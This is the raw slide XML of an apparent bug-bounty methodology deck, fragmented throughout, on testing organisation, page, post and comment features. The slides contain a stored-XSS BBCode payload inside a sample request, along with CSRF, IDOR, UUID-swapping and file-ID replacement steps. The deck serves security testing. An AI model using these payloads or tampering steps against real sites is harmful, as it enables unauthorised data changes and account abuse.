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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserrat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Source Code Pro"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald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SourceCodePro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SourceCodePro-italic.fntdata"/><Relationship Id="rId45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ArialBlack-regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald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2f51227b3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2f51227b3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af5df03d41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af5df03d41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af5df03d4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af5df03d4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7859220cb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7859220cb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7859220cb2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7859220cb2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7859220cb2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7859220cb2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7859220cb2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7859220cb2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bbeb7491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bbeb7491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859220cb2_0_9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859220cb2_0_9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b02dab0f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b02dab0f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7859220cb2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7859220cb2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859220cb2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859220cb2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7859220cb2_0_10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7859220cb2_0_1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7859220cb2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7859220cb2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7859220cb2_0_10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7859220cb2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af5df03d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af5df03d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af5df03d41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af5df03d4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7859220cb2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7859220cb2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7859220cb2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7859220cb2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b7d1242b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b7d1242b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7859220c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7859220c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a79e173ea3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a79e173ea3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af5df03d4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af5df03d4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859220cb2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7859220cb2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859220cb2_0_1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859220cb2_0_1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7859220cb2_0_1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7859220cb2_0_1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f5df03d4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f5df03d4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7859220cb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7859220cb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af5df03d4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af5df03d4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46" name="Google Shape;14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0" name="Google Shape;15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51" name="Google Shape;15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8" name="Google Shape;16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69" name="Google Shape;16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75" name="Google Shape;17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178" name="Google Shape;17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5" name="Google Shape;18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7" name="Google Shape;19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1" name="Google Shape;20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5" name="Google Shape;22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1" name="Google Shape;23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5" name="Google Shape;24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46" name="Google Shape;24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49" name="Google Shape;24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0" name="Google Shape;25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1" name="Google Shape;25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2" name="Google Shape;25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6" name="Google Shape;25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57" name="Google Shape;25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2" name="Google Shape;26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6" name="Google Shape;26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7" name="Google Shape;26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68" name="Google Shape;26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1" name="Google Shape;27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3" name="Google Shape;27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274" name="Google Shape;27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hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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hyperlink" Target="https://bugreader.com/social/100955" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@JubaBaghdad/how-i-was-able-to-delete-any-image-in-facebook-community-question-forum-a03ea516e327" TargetMode="External"/><Relationship Id="rId7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blog.zsec.uk/persisting-pornhub/" TargetMode="External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s://twitter.com/sin_khe/status/1247829032265289728" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1265217322308046849" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/s0md3v/status/1176521784826331136" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/@kedrisec/publish-tweets-by-any-other-user-6c9d892708e3" TargetMode="External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hyperlink" Target="https://twitter.com/intigriti/status/1359128684775550980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ortswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/bappstore/f89f2837c22c4ab4b772f31522647ed8" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/95552" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3K1-a7dnA6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hyperlink" Target="https://twitter.com/intigriti/status/1217794181982302208" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId6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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/56588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slide" Target="/ppt/slides/slide3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide9.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide10.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide12.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide25.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide11.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide27.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide23.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide24.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide24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hyperlink" Target="https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://twitter.com/intigriti/status/1103705724826411009" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hunter0x7/status/1321149883764645891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hyperlink" Target="https://twitter.com/intigriti/status/1078318258661531648" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1318532648734773249" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Haoneses/status/1292456202857742338" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17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gist.githubusercontent.com/jstnkndy/451bb51ca118c14989982f9ce8df5e44/raw/70e9df60d320b61c891c6efbe1dd6981c2bc02c1/gistfile1.txt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twitter.com/NahamSec/status/1162060338696613889" TargetMode="External"/><Relationship Id="rId6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hyperlink" Target="https://hackerone.com/reports/413759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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.securitybreached.org/2018/05/18/get-subscription-of-120-year-for-free-bug-bounty-poc/" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@khaled.hassan/how-i-got-paid-premium-plan-for-free-on-many-popular-websites-90e62a52416a" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hunter0x7/status/1352572216119062528" TargetMode="External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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1113781939838779392" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId6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twitter.com/MasterSEC_AR/status/1256689299833176069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hyperlink" Target="https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/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hackerone.com/reports/7882" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/948929" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/946053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hyperlink" Target="https://hackerone.com/reports/17675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medium.com/@ozil.hakim/stored-xss-in-yahoo-and-all-subdomains-bbcaa7c3b8d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medium.com/@TheShahzada/stored-xss-in-yahoo-b0878ecc97e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s://ahussam.me/Medium-full-account-takeover/" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://buer.haus/2014/06/16/facebook-stored-cross-site-scripting-xss-badges/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/141463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twitter.com/intigriti/status/1323614674143846403" TargetMode="External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https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://verneet.com/fuzzing-77-till-p1/" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://hackerone.com/reports/36381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0" name="Google Shape;28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81" name="Google Shape;28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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150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83" name="Google Shape;283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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020450" y="2328700"/>
            <a:ext cx="4943400" cy="291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                       Create New Organization , Page , Post OR Comment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill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6650" y="2392525"/>
            <a:ext cx="252650" cy="1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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020450" y="2683100"/>
            <a:ext cx="4943400" cy="291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                          Edit Your Organization , Page , Post OR Comment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="Google Shape;287;p4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36650" y="2746925"/>
            <a:ext cx="252650" cy="1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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020450" y="3037488"/>
            <a:ext cx="4943400" cy="2919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                      Remove Your Organization , Page , Post OR Comment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="289" name="Google Shape;289;p4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36650" y="3101325"/>
            <a:ext cx="252650" cy="16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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020450" y="491575"/>
            <a:ext cx="5350200" cy="15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ORG</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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Page - Post - Comment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Post By </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uploading</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> File </a:t>
            </a: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Replace File ID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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Existence File ID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, Then Delete This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53" name="Google Shape;453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You Can Post File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Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Request And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace File ID To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Existence File ID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Try To Delete This Post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 Wait A Little , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then Check The File That contains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     The Existence File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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54" name="Google Shape;454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55" name="Google Shape;455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57" name="Google Shape;45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59" name="Google Shape;45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762" y="2455550"/>
            <a:ext cx="1323825" cy="69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61" name="Google Shape;461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Can Post By Using BBCode </a:t>
            </a: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Inject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XSS Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[url=http://company.com/"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onmouseover="alert(document.domain)" ] target="_blank"&gt;http://[url=http://company.com/"/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onmouseover="alert(document.domain)"/]http://a/"[/url] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Stored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67" name="Google Shape;467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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /append-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST-COMMENT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content=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[url=http://company.com/"onmouseover="alert(document.domain)" ] target="_blank"&gt;http://[url=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http://company.com/"/onmouseover="alert(document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.domain)"/]http://a/"[/url]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;id=number&amp;token=Anti-CSRF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68" name="Google Shape;468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69" name="Google Shape;469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71" name="Google Shape;47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73" name="Google Shape;47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79" name="Google Shape;479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81" name="Google Shape;481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Creating ORG , Page , Post OR Comment , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There Anti-CSRF OR Not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Parameters OR Request Headers , If Not Try To Do CSRF POC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2" name="Google Shape;48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/setting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CSRF-Token: CSRF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email=me@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=CSRF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484" name="Google Shape;484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85" name="Google Shape;485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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933725" y="4542625"/>
            <a:ext cx="1057500" cy="2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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189325" y="3422700"/>
            <a:ext cx="1717800" cy="24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900" y="0"/>
            <a:ext cx="9239976" cy="5169876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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4632240"/>
            <a:ext cx="90162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Hack3rScr0lls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494" name="Google Shape;494;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4689550"/>
            <a:ext cx="3128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95" name="Google Shape;495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689562"/>
            <a:ext cx="503200" cy="427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0" name="Google Shape;5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0" y="16175"/>
            <a:ext cx="9144000" cy="460677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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4632240"/>
            <a:ext cx="9016200" cy="542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B5394"/>
                </a:solidFill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Somdev Sangwan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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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502" name="Google Shape;502;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4689550"/>
            <a:ext cx="3128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503" name="Google Shape;503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0925" y="4689562"/>
            <a:ext cx="503200" cy="427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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creating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Editing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Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Post OR Comment , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace ID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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another ID </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get IDOR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09" name="Google Shape;509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/append-POST-COMMENT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content=message&amp;id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID-Another-Account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=Anti-CSRF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510" name="Google Shape;510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11" name="Google Shape;511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13" name="Google Shape;51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15" name="Google Shape;51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21" name="Google Shape;521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23" name="Google Shape;523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Swap</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> UUID To Numeric ID e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx To 12345</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Because Some Endpoints Are Supporting Legacy Numeric ID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4" name="Google Shape;52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26" name="Google Shape;526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After Creating ORG , Page , Post OR Comment , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace ID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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another ID While Doing Action e.g. Add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Edit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Remove </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On The ORG , Page , Post OR Comment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33" name="Google Shape;533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Create Two </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORG , Page , Post OR Comment , One On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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and The Second On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome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Try To Get ID Of ORG , Page , Post OR Comment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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Both 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Do</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Replace And Match In Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR Use</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a: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Autorize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And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00FF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AutoRepeater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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do Any Action</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> On ORG , Page , Post OR Comment</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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34" name="Google Shape;534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35" name="Google Shape;535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537" name="Google Shape;537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540" name="Google Shape;540;p5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41" name="Google Shape;541;p5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7" name="Google Shape;547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49" name="Google Shape;549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Need To Find UUID , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Register The Victim Email</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Sometimes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UUID Reflect In The Response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0" name="Google Shape;55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52" name="Google Shape;552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68575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59" name="Google Shape;559;p5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5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61" name="Google Shape;561;p5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Option To Add Email , Try To Add Email With Company Mail Address</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. any@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Gain Extra Authorities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62" name="Google Shape;56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3" name="Google Shape;563;p5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/add-Email-To-ORG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any@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;action=add&amp;token=CSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="564" name="Google Shape;56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Steps while Creating , Editing OR Remov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ORG - Page - Post - Comment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98" name="Google Shape;29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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382900" y="3122588"/>
            <a:ext cx="15051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uFill>
                  <a:noFill/>
                </a:uFill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BXSS OR XSS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00" name="Google Shape;300;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276775" y="1496288"/>
            <a:ext cx="15051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Comment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01" name="Google Shape;301;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129925" y="3122600"/>
            <a:ext cx="12459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uFill>
                  <a:noFill/>
                </a:uFill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Blind CSTI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02" name="Google Shape;302;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617750" y="3133400"/>
            <a:ext cx="9039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uFill>
                  <a:noFill/>
                </a:uFill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SSTI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03" name="Google Shape;303;p41"/>
          <p:cNvSpPr/>
